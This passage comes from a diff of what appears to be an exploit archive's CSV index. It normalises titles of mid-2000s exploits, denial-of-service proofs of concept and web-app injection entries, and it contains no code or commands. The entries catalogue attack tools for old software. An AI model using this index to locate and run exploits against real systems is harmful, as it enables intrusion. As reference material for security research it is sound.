Overflow",2004-08-01,"Serkan Akpolat",linux,local,0 370,platforms/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,linux,dos,0 371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,linux,dos,0 @@ -352,7 +352,7 @@ id,file,description,date,author,platform,type,port 375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 378,platforms/windows/remote/378.pl,"BlackJumboDog - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 -379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution Exploit",2004-08-06,anonymous,linux,remote,0 +379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 381,platforms/windows/local/381.c,"Serv-U 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0 @@ -364,12 +364,12 @@ id,file,description,date,author,platform,type,port 388,platforms/windows/local/388.c,"Ollydbg 1.10 - Format String Bug",2004-08-10,"Ahmet Cihan",windows,local,0 389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote,0 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0 -391,platforms/osx/remote/391.pl,"Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 +391,platforms/osx/remote/391.pl,"Apple Mac OS X 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 -396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit (teso)",2002-01-01,Teso,bsd,local,0 +396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Exploit",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873 399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873 @@ -380,18 +380,18 @@ id,file,description,date,author,platform,type,port 405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0 406,platforms/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",php,webapps,0 407,platforms/cgi/webapps/407.txt,"AWStats 5.0-6.3 - Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 -408,platforms/linux/remote/408.c,"Qt - .bmp Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0 +408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0 409,platforms/bsd/remote/409.c,"BSD (TelnetD) - Remote Root Exploit",2001-06-09,Teso,bsd,remote,23 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0 -417,platforms/linux/local/417.c,"SquirrelMail - (chpasswd) Privilege Escalation (Bruteforce Exploit)",2004-08-25,Bytes,linux,local,0 -418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0 +417,platforms/linux/local/417.c,"SquirrelMail - (chpasswd) Privilege Escalation (Brute Force Exploit)",2004-08-25,Bytes,linux,local,0 +418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0 419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos,0 421,platforms/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0 422,platforms/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service",2004-08-27,"Luigi Auriemma",windows,dos,0 -423,platforms/windows/dos/423.pl,"Easy File Sharing Webserver 1.25 - Denial of Service",2004-08-27,"GulfTech Security",windows,dos,0 +423,platforms/windows/dos/423.pl,"Easy File Sharing WebServer 1.25 - Denial of Service",2004-08-27,"GulfTech Security",windows,dos,0 424,platforms/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,linux,remote,504 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0 426,platforms/windows/remote/426.c,"TiTan FTP Server - Long Command Heap Overflow (PoC)",2004-08-31,lion,windows,remote,21 @@ -406,7 +406,7 @@ id,file,description,date,author,platform,type,port 435,platforms/windows/remote/435.c,"Trillian 0.74i - Remote Buffer Overflow (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Privilege Escalation",2004-09-08,mantra,php,webapps,0 437,platforms/linux/remote/437.c,"Citadel/UX 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 -438,platforms/linux/local/438.c,"CDRecord - $RSH exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 +438,platforms/linux/local/438.c,"CDRecord - '$RSH' exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow",2004-09-12,Delikon,windows,remote,21 463,platforms/windows/dos/463.c,"Serv-U < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0 464,platforms/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps,0 @@ -427,19 +427,19 @@ id,file,description,date,author,platform,type,port 480,platforms/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)",2004-09-25,"John Bissell",windows,remote,0 482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 swxxx - Privilege Escalation",2002-12-11,watercloud,hp-ux,local,0 551,platforms/linux/dos/551.c,"MyServer 0.7.1 - (POST) Denial of Service",2004-09-27,"Tom Ferris",linux,dos,0 -556,platforms/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0 +556,platforms/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-in-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,windows,local,0 559,platforms/windows/local/559.c,"Zinf 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0 -560,platforms/windows/local/560.txt,"GlobalSCAPE - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0 +560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0 561,platforms/php/webapps/561.sh,"Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,php,webapps,0 562,platforms/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service",2004-09-29,"securma massine",windows,dos,0 565,platforms/php/webapps/565.txt,"Silent Storm Portal - Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0 566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,windows,remote,80 -568,platforms/windows/remote/568.c,"Icecast 2.0.1 Win32 - Remote Code Execution Exploit",2004-10-06,Delikon,windows,remote,8000 -570,platforms/php/webapps/570.txt,"Wordpress 1.2 - HTTP Splitting",2004-10-10,"Tenable NS",php,webapps,0 +568,platforms/windows/remote/568.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (1)",2004-10-06,Delikon,windows,remote,8000 +570,platforms/php/webapps/570.txt,"WordPress 1.2 - HTTP Splitting",2004-10-10,"Tenable NS",php,webapps,0 571,platforms/windows/dos/571.c,"Monolith Games - Local Buffer Overflow",2004-10-10,"Luigi Auriemma",windows,dos,0 572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0 -573,platforms/windows/remote/573.c,"Icecast 2.0.1 Win32 - Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 +573,platforms/windows/remote/573.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (2)",2004-10-12,K-C0d3r,windows,remote,8000 574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0 577,platforms/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow",2004-10-15,class101,windows,remote,25 578,platforms/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0 @@ -448,8 +448,8 @@ id,file,description,date,author,platform,type,port 581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 -584,platforms/windows/remote/584.c,"Microsoft Windows (Windows/x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 -585,platforms/windows/dos/585.pl,"Microsoft Windows IIS - WebDAV XML Denial of Service (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 +584,platforms/windows/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 +585,platforms/windows/dos/585.pl,"Microsoft IIS - WebDAV XML Denial of Service (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0 587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 @@ -463,7 +463,7 @@ id,file,description,date,author,platform,type,port 599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service",2004-10-26,muts,windows,dos,0 600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0 -602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 - (MMDF deliver) Privilege Escalation",2004-10-26,"Ramon Valle",sco,local,0 +602,platforms/sco/local/602.c,"SCO OpenServer 5.0.7 - (MMDF deliver) Privilege Escalation",2004-10-26,"Ramon Valle",sco,local,0 603,platforms/windows/dos/603.c,"Master of Orion III 1.2.5 - Denial of Service",2004-10-27,"Luigi Auriemma",windows,dos,0 604,platforms/windows/dos/604.c,"Age of Sail II 1.04.151 - Remote Buffer Overflow",2004-03-03,"Luigi Auriemma",windows,dos,0 605,platforms/windows/dos/605.c,"Alpha Black Zero 1.04 - Remote Denial of Service",2004-03-03,"Luigi Auriemma",windows,dos,0 @@ -484,8 +484,8 @@ id,file,description,date,author,platform,type,port 626,platforms/windows/dos/626.c,"Kerio Personal Firewall 4.1.1 - Multiple IP Options Denial of Service",2004-11-12,houseofdabus,windows,dos,0 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143 628,platforms/windows/dos/628.c,"NetNote Server 2.2 build 230 - Crafted String Denial of Service",2004-11-13,class101,windows,dos,0 -629,platforms/multiple/local/629.c,"Multiple AntiVirus - .zip Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 -630,platforms/php/webapps/630.pl,"UBB.threads 6.2.x < 6.3x - One Char Bruteforce Exploit",2004-11-15,RusH,php,webapps,0 +629,platforms/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 +630,platforms/php/webapps/630.pl,"UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit",2004-11-15,RusH,php,webapps,0 631,platforms/php/webapps/631.txt,"vBulletin - LAST.php SQL Injection",2004-11-15,anonymous,php,webapps,0 634,platforms/windows/dos/634.pl,"Secure Network Messenger 1.4.2 - Denial of Service",2004-11-15,ClearScreen,windows,dos,0 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,anonymous,php,webapps,0 @@ -508,7 +508,7 @@ id,file,description,date,author,platform,type,port 655,platforms/windows/dos/655.c,"Star Wars Battlefront 1.1 - Fake Players Denial of Service",2004-11-24,"Luigi Auriemma",windows,dos,0 657,platforms/linux/local/657.c,"atari800 - Privilege Escalation",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143 -659,platforms/cgi/webapps/659.txt,"eZshopper - 'loadpage.cgi' Directory Transversal",2004-11-25,"Zero X",cgi,webapps,0 +659,platforms/cgi/webapps/659.txt,"eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0 660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,windows,dos,0 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow",2004-11-29,muts,windows,remote,143 @@ -525,7 +525,7 @@ id,file,description,date,author,platform,type,port 676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0 679,platforms/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 -680,platforms/osx/local/680.txt,"Mac OSX Adobe Version Cue - Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 +680,platforms/osx/local/680.txt,"Apple Mac OS X Adobe Version Cue - Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0 @@ -541,15 +541,15 @@ id,file,description,date,author,platform,type,port 693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,windows,remote,21 694,platforms/windows/local/694.c,"WinRAR 3.4.1 - Corrupt ZIP File (PoC)",2004-12-16,"Vafa Khoshaein",windows,local,0 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 -697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - unserialize() Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0 +697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - Unserialize() Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",ultrix,local,0 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local,0 -700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN - Memory_Access_Violation Denial of Service",2004-12-21,"Emmanouel Kellinis",windows,dos,0 +700,platforms/windows/dos/700.html,"Microsoft Internet Explorer / MSN - Memory_Access_Violation Denial of Service",2004-12-21,"Emmanouel Kellinis",windows,dos,0 701,platforms/aix/local/701.sh,"AIX 4.3/5.1 - 5.3 lsmcode Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0 702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload (Santy.A)",2004-12-22,anonymous,php,webapps,0 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0 704,platforms/php/webapps/704.pl,"e107 - include() Remote Exploit",2004-12-22,sysbug,php,webapps,80 -705,platforms/multiple/remote/705.pl,"Webmin - BruteForce / Command Execution Exploit",2004-12-22,Di42lo,multiple,remote,10000 +705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution Exploit",2004-12-22,Di42lo,multiple,remote,10000 711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,21 712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0 @@ -557,45 +557,45 @@ id,file,description,date,author,platform,type,port 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - /bin/login Buffer Overflow",2004-12-24,"Marco Ivaldi",solaris,remote,513 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0 -719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer (XP SP2) - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 +719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer (Windows XP SP2) - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0 -721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0 +721,platforms/windows/dos/721.html,"Microsoft Windows - Kernel ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0 725,platforms/php/webapps/725.pl,"PHPInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0 726,platforms/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow",2004-12-26,class101,windows,remote,0 729,platforms/windows/remote/729.txt,"PHP 4.3.7 - openlog() Buffer Overflow",2004-12-28,"The Warlock [BhQ]",windows,remote,80 730,platforms/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution with Parameters (PoC)",2004-12-28,ShredderSub7,windows,remote,0 -733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 +733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution",2004-12-31,zuc,windows,remote,42 734,platforms/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 736,platforms/windows/dos/736.c,"SOLDNER Secret Wars 30830 - Denial of Service",2005-01-04,"Luigi Auriemma",windows,dos,20000 -737,platforms/php/webapps/737.txt,"QWikiwiki - Directory Traversal",2005-01-04,Madelman,php,webapps,0 +737,platforms/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,php,webapps,0 738,platforms/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service",2005-01-04,c0d3r,php,dos,0 739,platforms/bsd/local/739.c,"FreeBSD TOP - Format String",2001-07-23,truefinder,bsd,local,0 740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - Bot Install (Altavista) (ssh.D.Worm)",2005-01-04,"Severino Honorato",php,webapps,0 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0 742,platforms/windows/dos/742.c,"Gore 1.50 - Socket Unreacheable Denial of Service",2005-01-06,"Luigi Auriemma",windows,dos,0 -743,platforms/windows/dos/743.html,"Norton Antivirus < 2005 - Remote Stack Overflow",2005-01-06,"Rafel Ivgi",windows,dos,0 +743,platforms/windows/dos/743.html,"Norton AntiVirus < 2005 - Remote Stack Overflow",2005-01-06,"Rafel Ivgi",windows,dos,0 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 -746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce / Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 +746,platforms/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,windows,remote,6101 -753,platforms/windows/remote/753.html,"Microsoft Internet Explorer - .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 +753,platforms/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 754,platforms/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,php,webapps,0 -755,platforms/windows/dos/755.c,"Breed patch #1 - zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 +755,platforms/windows/dos/755.c,"Breed patch #1 - Zero-Length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 756,platforms/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local Exploit (PoC)",2005-01-15,"Rafael Carrasco",linux,local,0 758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0 759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0 760,platforms/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper Exploit",2005-01-16,ATmaCA,windows,local,0 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 -762,platforms/osx/dos/762.c,"Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0 +762,platforms/osx/dos/762.c,"Apple Mac OS X 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 764,platforms/linux/remote/764.c,"Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,linux,remote,80 -765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 -766,platforms/osx/local/766.c,"Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 +765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 +766,platforms/osx/local/766.c,"Apple Mac OS X 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21 769,platforms/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow Exploit",2005-01-24,ATmaCA,windows,local,0 770,platforms/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - '.qtif' Image Parsing",2005-01-24,ATmaCA,windows,dos,0 -771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 +771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 772,platforms/cgi/webapps/772.c,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (C)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (Perl)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 @@ -610,24 +610,24 @@ id,file,description,date,author,platform,type,port 784,platforms/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String Exploit",2005-02-03,CoKi,linux,remote,6667 785,platforms/linux/remote/785.c,"Newspost 2.1 - socket_getline() Remote Buffer Overflow (2)",2005-02-03,cybertronic,linux,remote,119 786,platforms/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,php,webapps,0 -787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 - Remote Buffer OverflowExploit (Windows 2003)",2005-02-04,CorryL,windows,remote,80 +787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow Exploit",2005-02-04,CorryL,windows,remote,80 788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0 789,platforms/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service (2)",2005-02-05,CorryL,linux,dos,6667 790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps,0 791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0 -793,platforms/osx/local/793.pl,"Mac OSX - .DS_Store Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 +793,platforms/osx/local/793.pl,"Apple Mac OS X - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 -795,platforms/osx/local/795.pl,"Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 +795,platforms/osx/local/795.pl,"Apple Mac OS X Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0 797,platforms/windows/dos/797.py,"Foxmail 2.0 - (MAIL FROM:) Denial of Service",2005-02-07,OYXin,windows,dos,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password 